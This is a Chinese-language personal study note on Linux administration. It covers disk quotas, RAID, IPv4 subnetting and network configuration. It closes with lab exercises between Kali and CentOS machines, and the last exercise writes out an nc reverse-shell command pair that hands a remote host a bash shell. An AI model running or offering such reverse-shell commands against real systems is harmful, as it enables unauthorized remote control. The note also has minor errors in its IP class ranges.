一、高级文件系统管理
1. 磁盘限额
下面用的逻辑卷FTP一定要格式化
1.修改文件,启动磁盘配额
mount -o remount,usrquota,grpquota /mnt/FTP
或者
vim /etc/fstab
写入/dev/vgroup/FTP /mnt/FTP ext4 defaults,usrquota,grpquota 0 0
保存退出:wq
mount -t ext4 /dev/vgroup/FTP /mnt/FTP
mount -o remount /mnt/FTP #刷新
mount | grep FTP #查看是否修改配置成功
2.关闭selinux
getenforce #查看selinux机制的状态
setenforce 0 #取消保护
3.生成配额文件
quotacheck -cvug /mnt/FTP
4.对用户设置限额
edquota -u stu1
修改其中的硬限制和软限制
或者使用一句话命令
setquota -u stu1 10000 20000 0 0 /mnt/FTP
5.启动配额限制
quotaon -ugv /mnt/FTP
quotaoff -ugv /mnt/FTP #关闭
6.测试
su stu1
dd if=/dev/zero of=/mnt/FTP/1.txt bs=1MB count=50 #这里是看前面你写的用户限制多少
这里必须注意一个点,这里得1.txt必须是stu1创建得,如果是其他用户创建的,好像就不会限制配额。
草,一种植物,就为这个点浪费了我一个小时,我tm反手就是一巴掌。
2.磁盘阵列RAID
- RAID0:好像跟逻辑卷很像。性能高,存储利用也高。但是一旦损坏好像就没得好像了。
- RAID1镜像卷: 使用率50%,通常2块,类似于一块写数据,一块备份。读写较慢。但是可以备份。成本高。磁盘坏了观察指示灯。一般用来做系统
- RAID5:最少3块磁盘。磁盘空间利用率N-1/N.浪费一块磁盘用于奇偶校验。只允许一块磁盘顺坏。一般用来存数据。
- RAID10 :有点类似于结合。快速读取和利用率高。
现在一般用阵列卡去操作,知道raid0和raid1和raid5区别就行。
二、网络配置和管理
1.网络参数认识
-
IPv4地址:32位二进制,以.分开4个字节,每个字节8位。由网络位与主机位构成。
A:第一个字节为0-127 255.0.0.0
B:第一个字节为128-191 255.255.0.0
C:第一个字节为191-223 255.255.255.0
D:第一个字节为224-239
E:第一个字节为240-255 -
如何判断网络位与主机位?通过子网掩码去确定。
子网掩码为1的部分为网络位,为0的部分为主机位 -
ip地址分为公有地址和私有地址
私有地址范围是:
10.0.0.0 到 10.255.255.255
172.16.0.0 到 172.31.255.255
192.168.0.0 到 192.168.255.255 -
必须掌握的技能:
看到一个IP地址及子网掩码,能快速写出对应的网络号,可用地址范围
网络号:这个网络的第一个地址位网络号
192.168.1.0/24
181.1.0.0/16
广播号:这个网路的最后一个地址为广播号
可用地址范围:2^x - 2 -
子网掩码:12.1.1.1/8
-
默认网关:类似于门。路由器的接口地址
-
DNS地址:域名服务器,解析域名的8.8.8.8 114.114.114.114 61.139.2.69
-
问:你的电脑能登录qq,微信,但是不能访问网站可能是什么原因?怎么解决?
DNS解析器可能错了 -
问:如果你的电脑不能上网,可能是什么原因?
反正看看ip,子网掩码,路由,dns解析,还有对应的服务慢慢排查 -
ifconfig(ip addr):网卡名称 ip地址 mac地址
ifup ens33
ifdown ens33
ip route(netstat -rn):查看网关地址
cat /etc/resolv.conf :查看dns地址
hostname:查看主机名
2.手动配置linux网络
如果查看网络参数时,发现没有相关的参数,也不能自动获取,则需要手动配置?
如何配置网络参数?
- 图形化界面配置
- 配置文件配置
- cd /etc/sysconfig/network-scripts/
- vim ifcfg-ens33
TYPE=Ethernet 网卡类型(以太网)
BOOTPROTO=dhcp (dhcp自动获取 static手动获取)
NAME=ens33 网卡的显示名称
DEVICE=ens33 网卡设备名称
ONBOOT=no 网卡是否随网络服务的启动而启动(yes,no)
重启网络服务 systemctl restart network(好像要自动获取dhcp才行)
IPADDR=192.168.64.128 //静态方式指定网卡的IP地址
NETMASK=255.255.255.0 //定义网卡的子网掩码
GATEWAY=192.168.64.254 //网络的默认网关
DNS1=192.168.75.200 //配置DNS地址
DNS2=114.114.114.114 - 查看网络参数
- 测试网络参数
#ping www.baidu.com 跟域名:测试是否能上网?跟内网IP:测试内网是否通信 ?跟网关地址:测试与网关是否通信?
#nslookup www.baidu.com 测试DNS服务器能否正确解析域名
#netstat -antp 查看哪些端口被连接
#traceroute www.baidu.com 路由跟踪
#wget https://www.baidu.com/index.html 下载文件
文件传送
#scp /root/index.html root@192.168.75.142:/root/index.html 将本地文件复制到
远程主机
#scp root@192.168.75.142:/root/index.html /root/index.html 将远程主机的文件复制到本机
#nc 命令反弹shell
#ssh 远程登录主机,命令格式:ssh 用户名@主机地址
ssh root@192.168.153.128 #不知道怎么开启ssh服务,但是电脑默认开启了也许?
systemctl start ssh
netstat -antp
练习
1.对网络配置的相关命令进行反复练习,理解含义
2.将kali和centos系连接到同一个网络,并能进行通信
3.在kali机使用ssh命令远程连接到centos系统
ssh root@192.168.153.128
4.在kali机使用scp命令对centos7系统进行文件传输
scp /home/zhanglinshan/demo.txt root@192.168.153.128:/root/1.txt
5.使用nc反弹shell,让kali机控制centos7系统
nc -lvp 9999
nc -e /bin/bash 192.168.153.129 9999